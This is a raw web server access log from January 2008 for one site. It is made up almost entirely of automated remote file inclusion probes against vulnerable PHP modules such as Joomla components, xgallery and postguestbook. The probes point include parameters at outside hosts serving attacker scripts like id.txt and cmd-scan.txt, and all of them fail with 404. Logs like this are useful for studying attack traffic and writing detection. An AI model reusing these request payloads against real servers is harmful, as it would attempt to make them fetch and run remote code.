200.76.111.11 - - [18/Jan/2008:12:48:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:48:52 -0800] "GET /logs/access_071222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:12:50:08 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:12:50:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:12:51:38 -0800] "GET /logs/access.log//send_reminders.php?noSet=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [18/Jan/2008:12:51:38 -0800] "GET /logs//send_reminders.php?noSet=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:12:51:49 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.35.179 - - [18/Jan/2008:12:52:08 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:12:53:58 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:54:01 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:54:01 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:54:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:54:02 -0800] "GET /logs/access_071222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [18/Jan/2008:12:54:41 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [18/Jan/2008:12:54:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [18/Jan/2008:12:54:42 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:54:58 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:54:58 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:54:58 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:55:33 -0800] "GET /logs/access_071229.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:12:55:34 -0800] "GET /logs/access_071224.log/content.php?page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:12:55:34 -0800] "GET /content.php?page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:12:55:34 -0800] "GET /logs/content.php?page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:12:56:23 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:56:29 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:56:44 -0800] "GET /logs/access_071230.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:56:44 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:56:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:12:56:49 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:56:52 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [18/Jan/2008:12:57:22 -0800] "GET //calendar.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:57:23 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:57:24 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:57:24 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:57:34 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:57:34 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:57:34 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.162.162.251 - - [18/Jan/2008:12:57:46 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [18/Jan/2008:12:57:46 -0800] "GET //modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [18/Jan/2008:12:57:47 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:58:10 -0800] "GET /logs/access_071230.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:58:10 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:12:58:11 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:58:26 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:58:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:58:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [18/Jan/2008:12:58:35 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [18/Jan/2008:12:58:40 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [18/Jan/2008:12:58:46 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:59:27 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:59:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:59:27 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:13:00:19 -0800] "GET /logs/access_071229.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:13:00:21 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:13:00:22 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:13:00:56 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:01:44 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:01:53 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:13:02:16 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:13:02:16 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:13:02:17 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:02:34 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:02:34 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:13:02:35 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:02:38 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:02:39 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:13:02:39 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:13:03:24 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.20.57 - - [18/Jan/2008:13:03:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.218 - - [18/Jan/2008:13:05:24 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.27.33 - - [18/Jan/2008:13:06:19 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:13:06:32 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:13:06:33 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:06:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:13:06:34 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:13:06:34 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:07:14 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:07:14 -0800] "GET /convert/mvcw.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:07:15 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [18/Jan/2008:13:07:15 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:07:38 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:07:38 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:07:38 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:13:07:38 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:08:14 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:13:08:17 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:13:08:27 -0800] "GET /logs/access_071222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
69.89.20.57 - - [18/Jan/2008:13:08:39 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.20.57 - - [18/Jan/2008:13:08:39 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.20.57 - - [18/Jan/2008:13:08:40 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:13:08:57 -0800] "GET /logs/access_071222.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:13:10:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:13:10:23 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:13:11:01 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:13:11:01 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:13:11:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:11:30 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:11:31 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:13:11:31 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:11:41 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:11:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:13:11:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.69.36 - - [18/Jan/2008:13:11:52 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.205.69.36 - - [18/Jan/2008:13:11:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
